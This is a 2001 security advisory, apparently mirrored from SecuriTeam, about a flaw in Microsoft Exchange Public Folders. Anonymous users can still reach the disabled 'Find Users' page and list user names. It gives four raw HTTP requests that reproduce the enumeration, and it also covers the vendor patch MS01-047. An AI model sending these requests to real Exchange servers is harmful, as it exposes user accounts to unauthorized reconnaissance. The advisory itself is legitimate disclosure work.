Lucene search

K
securityvulnsSecurityvulnsSECURITYVULNS:DOC:2013
HistorySep 08, 2001 - 12:00 a.m.

Exchange Public Folders Information Leakage

2001-09-0800:00:00
vulners.com
33

The following security advisory is sent to the securiteam mailing list,
and
can be found at the SecuriTeam web site: http://www.securiteam.com

SUMMARY

Microsoft Exchange Server handles anonymous access to its Public Folders

insecurely. While administrators may disable the "Find Users" features
to
prevent anonymous users from enumerating existing user names, a security

flaw in Exchange server allows remote attackers with access to the
exchange server to run "Find Users".

DETAILS

Microsoft Exchange's Public Folders options of "Find Users" can be
disabled. This, however, does not prevent the users from directly
accessing the ASP page (fumsg.asp). The link to the "Find Users" will be

hidden, however it is still possible to programmatically access the
page.

Steps to recreate:
1) Contact:
GET /exchange/root.asp?acs=anon HTTP/1.1
Host: www.example.com

2) Access the redirected page, and resend the issued cookie.
GET /exchange/logonfrm.asp HTTP/1.1
Host: www.example.com
Cookie: ASPSESSIONIDGGQGQGFW=EABMCPIDGABPDJIKNOGBBPPN

3) Access the redirected page, and resend the issued cookie.
GET /exchange/root.asp?acs=anon HTTP/1.1
Host: www.example.com
Cookie: ASPSESSIONIDGGQGQGFW=EABMCPIDGABPDJIKNOGBBPPN

4) Issue this request to obtain a list of users with the letter 'a' in
their name (e.g. Administrator)
POST /exchange/finduser/fumsg.asp HTTP/1.1
Host: www.example.com
Accept: /
Content-Type: application/x-www-form-urlencoded
Content-Length: 44
Cookie: ASPSESSIONIDGGQGQGFW=EABMCPIDGABPDJIKNOGBBPPN

DN=a&FN=&LN=&TL=&AN=&CP=&DP=&OF=&CY=&ST=&CO=

Vendor status:
Microsoft has been contacted on August 4, 2001. A security bulletin was
released on September 7, 2001.

Solution:
Microsoft has released a patch for this problem. See
<http://www.microsoft.com/technet/treeview/default.asp?url=/technet/secu
rity/bulletin/MS01-047.asp> Microsoft Security Bulletin MS01-047 for
more information.

ADDITIONAL INFORMATION
This security hole was discovered by <mailto:[email protected]> Noam
Rathaus.
The information has been provided by <mailto:[email protected]>
SecuriTeam Experts.

====================

DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of
any
kind.
In no event shall we be liable for any damages whatsoever including
direct,
indirect, incidental, consequential, loss of business profits or special
damages.